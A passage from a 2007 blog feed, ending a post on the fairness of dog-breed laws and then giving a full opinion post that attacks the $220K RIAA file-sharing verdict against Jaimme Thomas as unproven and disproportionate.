But in the middle of all this confusion the dogs have been left unprotected. It is important to remember that dogs are human-created species through selective breeding of members from the Grey Wolf species. That thrusts a moral responsibility on us as to how we should treat them. If we choose to make laws about them, then we should ensure that these laws are ‘fair’, much like the laws about humans should be fair (of course, torture must be legalized in national interest, and all the Arabs and Arab-looking must be randomly selected to additional security checks on all flights).

]]>
http://www.semanticoverload.com/2007/10/31/legalities-with-pit-bull/feed/ 0
$220K, the RIAA, and more http://www.semanticoverload.com/2007/10/08/220k-the-riaa-and-more/ http://www.semanticoverload.com/2007/10/08/220k-the-riaa-and-more/#comments Tue, 09 Oct 2007 00:53:13 +0000 Semantic Overload http://semanticoverload.gaddarinc.com/?p=126 Now that Jaimme Thomas has decided to appeal against the verdict that held her liable to the tune of $220K in the lawsuit against RIAA, the old debate of Copyright laws, Digital Right Management and the RIAA itself have resurfaced.

For starts, the case itself was resolved in a somewhat shady manner. The judge required that the jury merely conclude whether or not the music files were made available for sharing. There was no requirement to prove that the files were actually copied illegally. This is like having to pay a hefty sum for leaving your CD out in public for anyone to copy. How can I be held responsible for what someone else does with my CD? I have no control over that! I am not saying Jaimme Thomas is innocent, but I am arguing that she has not been proven guilty. That in my opinion makes all the difference.

Secondly, there is no way for the recording industry to put any figure on how much money they are losing due to illegal file sharing. So I cannot understand what the basis of the figure $220K which was arrived at. Typically such fines serve two purposes: (a) they serve as a deterrent for against the crime, and (b) compensate the aggrieved party adequately. This fine does neither.

Jaimme Thomas makes $36,000 a year. It will take her over 8 years to pay that sum if she subsists on food stamps, sells her kidney, puts her kids up for adoption and lives under the bridge. Practically speaking, if she is forced to pay the fine, she will have to declare bankruptcy. Hardly fitting punishment for the crime! If over-reaction works, then why not send everyone to the gallows?

Secondly, when the RIAA has no idea how much money it loses to illegal file sharing, and does not know if the the files in question in this case were shared or not, then on what basis can anyone state that the RIAA has been adequately compensated? Especially if the files were never illegally downloaded at all!

If RIAA continues this war path, it will only serve to make people more militant, and serve to detract artists from the recording labels. The internet is serving to be a great equalizer. Artists can now sell their music independently on the internet through sites like Myspace.

So where is RIAA going with this? I suspect to their own demise, or at the least to a self inflicted embarrassment.

]]>
http://www.semanticoverload.com/2007/10/08/220k-the-riaa-and-more/feed/ 0